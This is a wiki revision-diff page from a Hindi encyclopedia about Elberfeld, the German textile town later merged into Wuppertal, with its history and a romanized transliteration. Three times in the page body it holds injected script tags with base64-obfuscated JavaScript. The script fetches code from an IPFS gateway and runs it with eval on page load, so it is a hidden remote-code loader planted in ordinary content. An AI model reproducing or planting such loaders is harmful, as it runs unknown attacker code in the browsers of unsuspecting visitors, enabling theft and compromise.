Difference between revisions of "एल्बरफ़ील्ड"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''एल्बरफ़ील्ड''' जर्मनी का एक औद्योगिक नगर है। यह बुप...' के साथ नया पृष्ठ बनाया)
 
m (Text replacement - "तेजी " to "तेज़ी")
 
Line 1: Line 1:
'''एल्बरफ़ील्ड''' जर्मनी का एक औद्योगिक नगर है। यह बुपर नदी की घाटी तक विस्तृत है। बार्मेन में सम्मिलित कर लेने के बाद इसका नाम बदलकर वुपरतल हो गया। शहर के मध्य भाग में टेढ़ी-मेढ़ी संकीर्ण गलियाँ हैं। बहुतेरे गंदे मकानों को तोड़कर भव्य भवन निर्मित हुए हैं। यहाँ एक अजायबघर और चिड़ियाखाना है। यह जर्मनी के वस्त्रोद्योग का एक मुख्य केंद्र है। यहाँ बिसातखाने की हर प्रकार की वस्तुएँ, रंग, अच्छे रासायनिक पदार्थ, रबड़ और चमड़े के सामन तथा कागज और काँच के सामान बनते हैं। द्वितीय महासमर काल में यह नगर लगातार बमबाजी के कारण प्राय: पूर्ण रूप से ध्वस्त हो गया था। पुनर्निर्माण कार्य युद्धोपरांत बड़ी तेजी से हुआ है। शीघ्र ही पूर्ववत्‌ अवस्था में आ रही है।
+
'''एल्बरफ़ील्ड''' जर्मनी का एक औद्योगिक नगर है। यह बुपर नदी की घाटी तक विस्तृत है। बार्मेन में सम्मिलित कर लेने के बाद इसका नाम बदलकर वुपरतल हो गया। शहर के मध्य भाग में टेढ़ी-मेढ़ी संकीर्ण गलियाँ हैं। बहुतेरे गंदे मकानों को तोड़कर भव्य भवन निर्मित हुए हैं। यहाँ एक अजायबघर और चिड़ियाखाना है। यह जर्मनी के वस्त्रोद्योग का एक मुख्य केंद्र है। यहाँ बिसातखाने की हर प्रकार की वस्तुएँ, रंग, अच्छे रासायनिक पदार्थ, रबड़ और चमड़े के सामन तथा कागज और काँच के सामान बनते हैं। द्वितीय महासमर काल में यह नगर लगातार बमबाजी के कारण प्राय: पूर्ण रूप से ध्वस्त हो गया था। पुनर्निर्माण कार्य युद्धोपरांत बड़ी तेज़ीसे हुआ है। शीघ्र ही पूर्ववत्‌ अवस्था में आ रही है।
  
 
वुपर नदी का स्वच्छ जल सूत धोने में बड़ा ही सहायक सिद्ध हुआ, इसलिए व्यापार और जनसंख्या बढ़ गई तथा सन्‌ 1532 ई. में यह एक नगर बन गया था। सन्‌ 1640ई. में इसके प्राचीर का निर्माण हुआ। सन्‌ 1760 ई. में रेशम वस्त्रोद्योग चालू हुआ और लाल (टर्की रेड) रंग से सूत की रँगाई का काम होने लगा। तब से यह जर्मनी का एक प्रमुख वस्त्रोद्योगिक केंद्र बन गया।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 2|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=254 |url=}}</ref>  
 
वुपर नदी का स्वच्छ जल सूत धोने में बड़ा ही सहायक सिद्ध हुआ, इसलिए व्यापार और जनसंख्या बढ़ गई तथा सन्‌ 1532 ई. में यह एक नगर बन गया था। सन्‌ 1640ई. में इसके प्राचीर का निर्माण हुआ। सन्‌ 1760 ई. में रेशम वस्त्रोद्योग चालू हुआ और लाल (टर्की रेड) रंग से सूत की रँगाई का काम होने लगा। तब से यह जर्मनी का एक प्रमुख वस्त्रोद्योगिक केंद्र बन गया।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 2|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=254 |url=}}</ref>  

Latest revision as of 08:22, 10 February 2021

elbarafild jarmani ka ek audyogik nagar hai. yah bupar nadi ki ghati tak vistrit hai. barmen mean sammilit kar lene ke bad isaka nam badalakar vuparatal ho gaya. shahar ke madhy bhag mean tedhi-medhi sankirn galiyaan haian. bahutere gande makanoan ko to dakar bhavy bhavan nirmit hue haian. yahaan ek ajayabaghar aur chi diyakhana hai. yah jarmani ke vastrodyog ka ek mukhy keandr hai. yahaan bisatakhane ki har prakar ki vastuean, rang, achchhe rasayanik padarth, rab d aur cham de ke saman tatha kagaj aur kaanch ke saman banate haian. dvitiy mahasamar kal mean yah nagar lagatar bamabaji ke karan pray: poorn roop se dhvast ho gaya tha. punarnirman kary yuddhoparaant b di tezise hua hai. shighr hi poorvavath‌ avastha mean a rahi hai.

vupar nadi ka svachchh jal soot dhone mean b da hi sahayak siddh hua, isalie vyapar aur janasankhya badh gee tatha sanh‌ 1532 ee. mean yah ek nagar ban gaya tha. sanh‌ 1640ee. mean isake prachir ka nirman hua. sanh‌ 1760 ee. mean resham vastrodyog chaloo hua aur lal (tarki red) rang se soot ki rangaee ka kam hone laga. tab se yah jarmani ka ek pramukh vastrodyogik keandr ban gaya.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 2 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 254 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>